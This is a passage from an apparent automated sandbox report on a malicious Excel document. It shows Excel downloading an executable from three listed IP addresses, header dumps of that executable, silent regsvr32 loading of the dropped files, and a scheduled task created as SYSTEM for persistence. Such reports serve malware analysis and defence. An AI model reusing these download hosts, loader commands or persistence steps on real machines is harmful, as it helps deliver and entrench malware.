      Data Raw:01 5d b3 80 01 00 04 00 00 00 03 00 30 aa 4a 02 90 02 00 48 02 02 48 09 00 c0 12 14 06 48 03 00 01 64 e3 04 04 04 00 0a 00 84 56 42 41 50 72 40 6f 6a 65 63 74 05 00 1a 00 54 00 40 02 0a 06 02 0a 3d 02 0a 07 2b 02 72 01 14 08 06 12 09 02 12 ba 76 a0 41 63 02 00 0c 02 4a 3c 02 0a 04 16 00 01 39 73 74 64 6f 6c 04 65 3e 02 19 73 00 74 00 64 00 00 6f 00 6c 00 65 00 0d 14 00 68 00 25 5e

      Network Behavior

      Network Port Distribution

      TCP Packets

      TimestampSource PortDest PortSource IPDest IP
      Sep 27, 2021 11:10:24.232299089 CEST4916580192.168.2.22190.14.37.173
      Sep 27, 2021 11:10:24.402055025 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:24.402177095 CEST4916580192.168.2.22190.14.37.173
      Sep 27, 2021 11:10:24.402961969 CEST4916580192.168.2.22190.14.37.173
      Sep 27, 2021 11:10:24.572657108 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:25.458786011 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:25.458848000 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:25.458865881 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:25.458884001 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:25.458899975 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:25.458915949 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:25.458930016 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:25.458954096 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:25.458978891 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:25.458996058 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:25.459002018 CEST4916580192.168.2.22190.14.37.173
      Sep 27, 2021 11:10:25.459044933 CEST4916580192.168.2.22190.14.37.173
      Sep 27, 2021 11:10:25.459048986 CEST4916580192.168.2.22190.14.37.173
      Sep 27, 2021 11:10:25.468147993 CEST4916580192.168.2.22190.14.37.173
      Sep 27, 2021 11:10:25.628865004 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:25.628891945 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:25.628906965 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:25.628926039 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:25.628947020 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:25.628963947 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:25.628983974 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:25.629002094 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:25.629019022 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:25.629045963 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:25.629060030 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:25.629072905 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:25.629085064 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:25.629106998 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:25.629126072 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:25.629142046 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:25.629743099 CEST4916580192.168.2.22190.14.37.173
      Sep 27, 2021 11:10:25.629817963 CEST4916580192.168.2.22190.14.37.173
      Sep 27, 2021 11:10:25.629826069 CEST4916580192.168.2.22190.14.37.173
      Sep 27, 2021 11:10:25.629829884 CEST4916580192.168.2.22190.14.37.173
      Sep 27, 2021 11:10:25.629832983 CEST4916580192.168.2.22190.14.37.173
      Sep 27, 2021 11:10:25.629836082 CEST4916580192.168.2.22190.14.37.173
      Sep 27, 2021 11:10:25.629837990 CEST4916580192.168.2.22190.14.37.173
      Sep 27, 2021 11:10:25.629839897 CEST4916580192.168.2.22190.14.37.173
      Sep 27, 2021 11:10:25.631917953 CEST4916580192.168.2.22190.14.37.173
      Sep 27, 2021 11:10:25.663012981 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:25.663055897 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:25.663075924 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:25.663156033 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:25.663337946 CEST4916580192.168.2.22190.14.37.173
      Sep 27, 2021 11:10:25.800775051 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:25.800831079 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:25.800848961 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:25.800868034 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:25.800885916 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:25.800991058 CEST4916580192.168.2.22190.14.37.173
      Sep 27, 2021 11:10:25.801026106 CEST4916580192.168.2.22190.14.37.173
      Sep 27, 2021 11:10:25.801054955 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:25.801080942 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:25.801101923 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:25.801105976 CEST4916580192.168.2.22190.14.37.173
      Sep 27, 2021 11:10:25.801120996 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:25.801139116 CEST4916580192.168.2.22190.14.37.173
      Sep 27, 2021 11:10:25.801143885 CEST4916580192.168.2.22190.14.37.173
      Sep 27, 2021 11:10:25.801162958 CEST4916580192.168.2.22190.14.37.173
      Sep 27, 2021 11:10:25.864458084 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:25.864492893 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:25.864516020 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:25.864538908 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:25.864561081 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:25.864588022 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:25.864612103 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:25.864682913 CEST4916580192.168.2.22190.14.37.173
      Sep 27, 2021 11:10:25.864713907 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:25.864799023 CEST4916580192.168.2.22190.14.37.173
      Sep 27, 2021 11:10:25.864814043 CEST4916580192.168.2.22190.14.37.173
      Sep 27, 2021 11:10:25.864975929 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:25.865458012 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:25.865492105 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:25.865601063 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:25.866909981 CEST4916580192.168.2.22190.14.37.173
      Sep 27, 2021 11:10:25.866940975 CEST4916580192.168.2.22190.14.37.173
      Sep 27, 2021 11:10:25.866945028 CEST4916580192.168.2.22190.14.37.173
      Sep 27, 2021 11:10:25.866947889 CEST4916580192.168.2.22190.14.37.173
      Sep 27, 2021 11:10:25.866950989 CEST4916580192.168.2.22190.14.37.173
      Sep 27, 2021 11:10:25.970748901 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:25.971235991 CEST4916580192.168.2.22190.14.37.173
      Sep 27, 2021 11:10:26.065752983 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:26.065821886 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:26.065840960 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:26.065859079 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:26.065876961 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:26.066268921 CEST4916580192.168.2.22190.14.37.173
      Sep 27, 2021 11:10:26.066483974 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:26.066519022 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:26.066543102 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:26.066565037 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:26.066586971 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:26.066612005 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:26.066636086 CEST8049165190.14.37.173192.168.2.22
      Sep 27, 2021 11:10:26.067260027 CEST4916580192.168.2.22190.14.37.173

      HTTP Request Dependency Graph

      • 190.14.37.173
      • 111.90.148.104
      • 51.89.115.111

      HTTP Packets

      Session IDSource IPSource PortDestination IPDestination PortProcess
      0192.168.2.2249165190.14.37.17380C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      TimestampkBytes transferredDirectionData
      Sep 27, 2021 11:10:24.402961969 CEST0OUTGET /44466.4649013889.dat HTTP/1.1
      Accept: */*
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
      Host: 190.14.37.173
      Connection: Keep-Alive
      Sep 27, 2021 11:10:25.458786011 CEST1INHTTP/1.1 200 OK
      Server: nginx
      Date: Mon, 27 Sep 2021 09:10:25 GMT
      Content-Type: application/octet-stream
      Content-Length: 495616
      Connection: keep-alive
      X-Powered-By: PHP/5.4.16
      Accept-Ranges: bytes
      Expires: 0
      Cache-Control: no-cache, no-store, must-revalidate
      Content-Disposition: attachment; filename="44466.4649013889.dat"
      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 61 1c 54 0a 25 7d 3a 59 25 7d 3a 59 25 7d 3a 59 e6 72 5a 59 26 7d 3a 59 b2 b9 44 59 24 7d 3a 59 02 bb 47 59 3e 7d 3a 59 02 bb 54 59 a5 7d 3a 59 e6 72 64 59 22 7d 3a 59 25 7d 3b 59 80 7d 3a 59 02 bb 55 59 71 7d 3a 59 02 bb 40 59 24 7d 3a 59 02 bb 46 59 24 7d 3a 59 02 bb 43 59 24 7d 3a 59 52 69 63 68 25 7d 3a 59 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 79 5f 07 45 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 90 02 00 00 f0 0e 00 00 00 00 00 df 31 00 00 00 10 00 00 00 a0 02 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 90 11 00 00 10 00 00 d4 fe 07 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 3f 07 00 d6 00 00 00 04 39 07 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 11 00 e0 0f 00 00 70 a1 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 2f 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 02 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 35 8e 02 00 00 10 00 00 00 90 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b6 a0 04 00 00 a0 02 00 00 b0 04 00 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 0b 0a 00 00 50 07 00 00 10 00 00 00 50 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 e6 24 00 00 00 60 11 00 00 30 00 00 00 60 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$aT%}:Y%}:Y%}:YrZY&}:YDY$}:YGY>}:YTY}:YrdY"}:Y%};Y}:YUYq}:Y@Y$}:YFY$}:YCY$}:YRich%}:YPELy_E!1?9<`p/@,.text5 `.rdata@@.data<PP@.reloc$`0`@B


      Session IDSource IPSource PortDestination IPDestination PortProcess
      1192.168.2.2249166111.90.148.10480C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      TimestampkBytes transferredDirectionData
      Sep 27, 2021 11:10:29.093961954 CEST521OUTGET /44466.4649013889.dat HTTP/1.1
      Accept: */*
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
      Host: 111.90.148.104
      Connection: Keep-Alive
      Sep 27, 2021 11:10:29.995018005 CEST522INHTTP/1.1 200 OK
      Server: nginx
      Date: Mon, 27 Sep 2021 09:10:30 GMT
      Content-Type: application/octet-stream
      Content-Length: 495616
      Connection: keep-alive
      X-Powered-By: PHP/5.4.16
      Accept-Ranges: bytes
      Expires: 0
      Cache-Control: no-cache, no-store, must-revalidate
      Content-Disposition: attachment; filename="44466.4649013889.dat"
      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 61 1c 54 0a 25 7d 3a 59 25 7d 3a 59 25 7d 3a 59 e6 72 5a 59 26 7d 3a 59 b2 b9 44 59 24 7d 3a 59 02 bb 47 59 3e 7d 3a 59 02 bb 54 59 a5 7d 3a 59 e6 72 64 59 22 7d 3a 59 25 7d 3b 59 80 7d 3a 59 02 bb 55 59 71 7d 3a 59 02 bb 40 59 24 7d 3a 59 02 bb 46 59 24 7d 3a 59 02 bb 43 59 24 7d 3a 59 52 69 63 68 25 7d 3a 59 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 79 5f 07 45 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 90 02 00 00 f0 0e 00 00 00 00 00 df 31 00 00 00 10 00 00 00 a0 02 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 90 11 00 00 10 00 00 d4 fe 07 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 3f 07 00 d6 00 00 00 04 39 07 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 11 00 e0 0f 00 00 70 a1 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 2f 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 02 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 35 8e 02 00 00 10 00 00 00 90 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b6 a0 04 00 00 a0 02 00 00 b0 04 00 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 0b 0a 00 00 50 07 00 00 10 00 00 00 50 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 e6 24 00 00 00 60 11 00 00 30 00 00 00 60 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$aT%}:Y%}:Y%}:YrZY&}:YDY$}:YGY>}:YTY}:YrdY"}:Y%};Y}:YUYq}:Y@Y$}:YFY$}:YCY$}:YRich%}:YPELy_E!1?9<`p/@,.text5 `.rdata@@.data<PP@.reloc$`0`@B


      Session IDSource IPSource PortDestination IPDestination PortProcess
      2192.168.2.224916751.89.115.11180C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      TimestampkBytes transferredDirectionData
      Sep 27, 2021 11:10:32.099535942 CEST1040OUTGET /44466.4649013889.dat HTTP/1.1
      Accept: */*
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
      Host: 51.89.115.111
      Connection: Keep-Alive
      Sep 27, 2021 11:10:32.311602116 CEST1042INHTTP/1.1 200 OK
      Server: nginx
      Date: Mon, 27 Sep 2021 09:10:32 GMT
      Content-Type: application/octet-stream
      Content-Length: 495616
      Connection: keep-alive
      X-Powered-By: PHP/5.4.16
      Accept-Ranges: bytes
      Expires: 0
      Cache-Control: no-cache, no-store, must-revalidate
      Content-Disposition: attachment; filename="44466.4649013889.dat"
      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 61 1c 54 0a 25 7d 3a 59 25 7d 3a 59 25 7d 3a 59 e6 72 5a 59 26 7d 3a 59 b2 b9 44 59 24 7d 3a 59 02 bb 47 59 3e 7d 3a 59 02 bb 54 59 a5 7d 3a 59 e6 72 64 59 22 7d 3a 59 25 7d 3b 59 80 7d 3a 59 02 bb 55 59 71 7d 3a 59 02 bb 40 59 24 7d 3a 59 02 bb 46 59 24 7d 3a 59 02 bb 43 59 24 7d 3a 59 52 69 63 68 25 7d 3a 59 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 79 5f 07 45 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 90 02 00 00 f0 0e 00 00 00 00 00 df 31 00 00 00 10 00 00 00 a0 02 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 90 11 00 00 10 00 00 d4 fe 07 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 3f 07 00 d6 00 00 00 04 39 07 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 11 00 e0 0f 00 00 70 a1 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 2f 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 02 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 35 8e 02 00 00 10 00 00 00 90 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b6 a0 04 00 00 a0 02 00 00 b0 04 00 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 0b 0a 00 00 50 07 00 00 10 00 00 00 50 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 e6 24 00 00 00 60 11 00 00 30 00 00 00 60 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$aT%}:Y%}:Y%}:YrZY&}:YDY$}:YGY>}:YTY}:YrdY"}:Y%};Y}:YUYq}:Y@Y$}:YFY$}:YCY$}:YRich%}:YPELy_E!1?9<`p/@,.text5 `.rdata@@.data<PP@.reloc$`0`@B


      Code Manipulations

      Statistics

      Behavior

      Click to jump to process

      System Behavior

      Analysis Process: EXCEL.EXE PID: 2824 Parent PID: 596

      General

      Start time:11:09:21
      Start date:27/09/2021
      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      Wow64 process (32bit):false
      Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
      Imagebase:0x13f360000
      File size:28253536 bytes
      MD5 hash:D53B85E21886D2AF9815C377537BCAC3
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate

      Analysis Process: regsvr32.exe PID: 1320 Parent PID: 2824

      General

      Start time:11:09:36
      Start date:27/09/2021
      Path:C:\Windows\System32\regsvr32.exe
      Wow64 process (32bit):false
      Commandline:regsvr32 -silent ..\Fiosa.der
      Imagebase:0xff640000
      File size:19456 bytes
      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Analysis Process: regsvr32.exe PID: 2196 Parent PID: 1320

      General

      Start time:11:09:36
      Start date:27/09/2021
      Path:C:\Windows\SysWOW64\regsvr32.exe
      Wow64 process (32bit):true
      Commandline: -silent ..\Fiosa.der
      Imagebase:0x340000
      File size:14848 bytes
      MD5 hash:432BE6CF7311062633459EEF6B242FB5
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate

      Analysis Process: regsvr32.exe PID: 1516 Parent PID: 2824

      General

      Start time:11:10:07
      Start date:27/09/2021
      Path:C:\Windows\System32\regsvr32.exe
      Wow64 process (32bit):false
      Commandline:regsvr32 -silent ..\Fiosa1.der
      Imagebase:0xff640000
      File size:19456 bytes
      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Analysis Process: regsvr32.exe PID: 2152 Parent PID: 1516

      General

      Start time:11:10:07
      Start date:27/09/2021
      Path:C:\Windows\SysWOW64\regsvr32.exe
      Wow64 process (32bit):true
      Commandline: -silent ..\Fiosa1.der
      Imagebase:0x340000
      File size:14848 bytes
      MD5 hash:432BE6CF7311062633459EEF6B242FB5
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate

      Analysis Process: explorer.exe PID: 2592 Parent PID: 2196

      General

      Start time:11:10:08
      Start date:27/09/2021
      Path:C:\Windows\SysWOW64\explorer.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\explorer.exe
      Imagebase:0x990000
      File size:2972672 bytes
      MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Analysis Process: schtasks.exe PID: 2820 Parent PID: 2592

      General

      Start time:11:10:13
      Start date:27/09/2021
      Path:C:\Windows\SysWOW64\schtasks.exe
      Wow64 process (32bit):true
      Commandline:'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn pmdfegez /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 11:12 /ET 11:24
      Imagebase:0xb0000
      File size:179712 bytes
      MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Analysis Process: regsvr32.exe PID: 1812 Parent PID: 1672

      General

      Start time:11:10:16
      Start date:27/09/2021
      Path:C:\Windows\System32\regsvr32.exe
      Wow64 process (32bit):false
      Commandline:regsvr32.exe -s 'C:\Users\user\Fiosa.der'
      Imagebase:0xff640000
      File size:19456 bytes
      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
